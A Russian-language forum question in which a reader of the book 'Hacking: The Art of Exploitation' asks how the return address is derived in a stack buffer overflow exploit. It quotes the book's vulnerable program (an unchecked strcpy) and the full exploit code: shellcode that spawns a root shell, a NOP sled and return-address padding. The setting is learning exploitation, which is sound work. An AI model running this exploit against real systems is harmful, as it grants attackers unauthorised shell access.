Переполнение буфера в стеке - адрес возврата "шелл-кода" - PullRequest
Новая
       80

Переполнение буфера в стеке - адрес возврата "шелл-кода"

0 голосов
/ 04 декабря 2018

Я читаю книгу «Взлом - Искусство эксплуатации, 2-е издание».

Я запутался в следующем примере внедрения строкового буфера в качестве аргумента уязвимому процессу переполнения буфера на основе стека.

Структура буфера:

|NOP |NOP ... NOP |NOP |код оболочки |RET |RET ... RET |

В уязвимом процессе этот буфер копируется в буфер символов и должен переполниться и заменить параметры базового стека, которые также включают исходный адрес возврата.

Согласно тексту - RET должен указывать на какое-то место на слайде NOP, чтобы заставить EIP скользить вниз по слайду NOP и выполнять код оболочки - звучит здорово!

Однако, как выводится этот адрес RET?

Уязвимый код (процесс # 1): 

int main(int argc, char *argv[]) {
    int userid, printing=1, fd; // File descriptor
    char searchstring[100];

    if(argc > 1) // If there is an arg
        strcpy(searchstring, argv[1]);  //<-------- buffer is injected here
    else // otherwise,
        searchstring[0] = 0;

Код эксплуатации -process # 2: 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";


int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret;
    char *command, *buffer;

    unsigned int offset=atoi(argv[1]);

    command = (char *) malloc(200);
    bzero(command, 200); // Zero out the new memory.

    strcpy(command, "./notesearch \'"); // Start command buffer.
    buffer = command + strlen(command); // Set buffer at the end.

    if(argc > 1) // Set offset.
        offset = atoi(argv[1]);

    ret = (unsigned int) &i - offset; //Set return address <---- How ???

    for(i=0; i < 160; i+=4) // Fill buffer with return address.
        *((unsigned int *)(buffer+i)) = ret;
    memset(buffer, 0x90, 60); // Build NOP sled.
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

    strcat(command, "\'");

    system(command); // Run exploit.
    free(command);
}

Является ли это совпадением, что переменная i объявлена ​​в верхней части процесса№ 2 основной?Должен ли ret получить возвращаемое значение из какого-либо места в главном стеке процесса # 1?

Редактировать: В частности, я не понимаю, как один процесс может получить доступ к области памяти другого процесса-

ret = (без знака int) & i - смещение;// Установить обратный адрес

Или, может быть, я что-то здесь неправильно понял.

...